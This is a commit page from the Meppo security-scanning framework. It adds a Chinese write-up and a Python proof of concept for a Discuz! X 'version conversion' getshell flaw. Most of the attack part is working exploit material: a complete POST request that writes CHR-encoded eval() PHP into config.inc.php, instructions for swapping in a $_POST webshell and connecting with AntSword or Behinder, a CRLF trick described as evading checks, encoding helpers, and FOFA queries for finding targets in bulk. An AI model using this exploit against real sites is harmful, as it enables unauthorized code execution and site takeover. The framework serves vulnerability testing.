WingsSec/Meppo
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Meppo 正式开源

Browse Source
This commit is contained in:
RabbitMask
2022-03-22 18:03:05 +08:00
parent 3b00767663
commit 1c6d5ff098
132 changed files with 5345 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

89
Moudle/Discuz/discuz_version_change_getshell.md Normal file
View File

@@ -0,0 +1,89 @@
# 1、漏洞描述
discuz! X系列的全版本其产品升级/转换的功能存在漏洞可利用构造的恶意语句将shell写入到config.inc.php配置文件从而实现getshell。
# 2、影响范围
discuz! X系列全版本
# 3、漏洞复现
漏洞利用的文件为utility/convert/index.php选择其中一个版本点击开始抓取下一个页面的提交请求。
![](images/image-20210903135314303.png)
![](images/image-20210903135652209.png)
修改请求包的POST内容为如下主要是修改红框中的内容
![](images/image-20210903135909982.png)
```
POST /Discuz_X3.2_SC_GBK/utility/convert/index.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 236
Origin: http://127.0.0.1
DNT: 1
Connection: close
Referer: http://127.0.0.1/Discuz_X3.2_SC_GBK/utility/convert/index.php?a=config&source=d7.2_x2.0
Upgrade-Insecure-Requests: 1
a=config&source=d7.2_x2.0&submit=yes&newconfig[aaa%0a%0deval(CHR(101).CHR(118).CHR(97).CHR(108).CHR(40).CHR(34).CHR(112).CHR(104).CHR(112).CHR(105).CHR(110).CHR(102).CHR(111).CHR(40).CHR(41).CHR(59).CHR(34).CHR(41).CHR(59));//]=aaaaaaaa
```
提交之后相应的shell就写入到了/utility/convert/data/config.inc.php文件中后面用蚁剑、冰蝎什么的连就可以了。
# 4、坑点
POST包中的source参数内容为目标现在的版本如果不对提交请求会无效的。因版本比较多手工党问题不大但脚本批量的话脚本中这个参数的值不多的话大概率会漏报。
这里无论是漏洞利用的URL还是最终写入到的URL中的文件都有一个问题那就是utility目录所在的位置对于不同的站来说很有可能不固定。网上下载的源码这个目录是在网站根目录的上一级目录手工的时候注意一下。脚本中是默认此目录在网站根目录了。
最重要的poc/exp的内容其明文部分是eval("phpinfo();"); 只需要改双引号中的内容即可比如shell为eval("$_POST['pass'];"); 但最终要转换为CHR类型的值。其中这个POST参数中的%0a%0d代表的是回车换行在python中为\x0a\x0d是为了躲避检查。CHR与STRING转换的脚本放在下面了。
# 5、CHR与STRING转换
## 5.1、CHR TO STRING
```
# _*_ coding:utf-8 _*_
import re
list1 = []
st = "CHR(60).CHR(63).CHR(112).CHR(104).CHR(112).CHR(32).CHR(101).CHR(99).CHR(104).CHR(111).CHR(32).CHR(39).CHR(97).CHR(98).CHR(99).CHR(39).CHR(59).CHR(63).CHR(62)"
ss = re.findall('\((\d+)\)+',str(st))
#print(ss)
for s in ss:
s = chr(int(s))
list1.append(str(s))
s = "".join(list1)
print(s)
```
## 5.2、STRING TO CHR
```
# _*_ coding:utf-8 _*_
list1 = []
st = "<?php echo 'abc';?>"
for s in st:
chr_s = ord(s)
list1.append("CHR("+str(chr_s)+")")
chr_ss = ".".join(list1)
print(chr_ss)
```
# 6、poc
poc默认漏洞URL的主目录是在网站根目录下了可能会有漏报POST参数中的sourcepoc中已经尽可能的多写了不排除会有漏报的情况出现。配合框架可批量测试脚本可发现漏洞。
若要getshell直接更改poc_key中的相关内容即可漏洞复现中也有写。

51
Moudle/Discuz/discuz_version_change_getshell.py Normal file
View File

@@ -0,0 +1,51 @@
#!/usr/bin/env python3
# _*_ coding:utf-8 _*_
import requests
import requests.packages.urllib3
from Config.config_requests import headers
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
# 脚本信息
######################################################
NAME='discuz_version_change_getshell'
AUTHOR="境心"
REMARK='discuz 版本转换功能getshell漏洞'
FOFA_RULE='app="Powered-by-Discuz!NT"'
FOFA_RULE='app="Tencent-Discuz"' ###这个也可以的
######################################################
def poc(target):
result = {}
poc_key = 'newconfig[aaa\x0a\x0deval(CHR(101).CHR(118).CHR(97).CHR(108).CHR(40).CHR(34).CHR(101).CHR(99).CHR(104).CHR(111).CHR(32).CHR(39).CHR(116).CHR(104).CHR(105).CHR(115).CHR(32).CHR(105).CHR(115).CHR(32).CHR(97).CHR(32).CHR(102).CHR(114).CHR(105).CHR(101).CHR(110).CHR(100).CHR(108).CHR(121).CHR(32).CHR(116).CHR(101).CHR(115).CHR(116).CHR(44).CHR(32).CHR(80).CHR(108).CHR(101).CHR(97).CHR(115).CHR(101).CHR(32).CHR(99).CHR(104).CHR(101).CHR(99).CHR(107).CHR(32).CHR(97).CHR(110).CHR(100).CHR(32).CHR(114).CHR(101).CHR(112).CHR(97).CHR(105).CHR(114).CHR(32).CHR(118).CHR(117).CHR(108).CHR(110).CHR(101).CHR(114).CHR(97).CHR(98).CHR(105).CHR(108).CHR(105).CHR(116).CHR(105).CHR(101).CHR(115).CHR(46).CHR(39).CHR(59).CHR(34).CHR(41).CHR(59));//]'
# utility目录在实际环境中的什么位置不确定默认在网站根目录下若不在网站根目录下的会漏报
vul_url = target+"/utility/convert/index.php"
# 经测试这里source可以写多个能匹配多个版本又不影响getshell时的功能source越多漏报越少
data = {
"a" :"config",
"source": "ss7.5_x2.0",
"source": "uch2.0_x2.0",
"source" : "d7.2_x2.0",
"source": "ss7.5_x1.5",
"source": "uch2.0_x1.0",
"source": "uch2.0_x1.5",
"source": "d7.2_x1.5",
"source": "d7.2_x1.0",
"source": "ss7.5_x1.0",
"submit" : "yes",
poc_key : "aaaa"
}
requests.post(vul_url, headers=headers, data=data, verify=False, timeout=5)
target_url = target+"/utility/convert/data/config.inc.php"
target_res = requests.get(target_url, headers=headers, verify=False, timeout=5)
if "this is a friendly test, Please check and repair vulnerabilities." in target_res.text:
result['poc_url'] = target_url
result['poc'] =NAME
result['message'] = "存在版本转换功能getshell漏洞"
return result
if __name__ == '__main__':
poc("http://127.0.0.1/Discuz_X3.2_SC_GBK/")

BIN
Moudle/Discuz/images/image-20210903135314303.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 56 KiB

BIN
Moudle/Discuz/images/image-20210903135652209.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 46 KiB

BIN
Moudle/Discuz/images/image-20210903135909982.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 62 KiB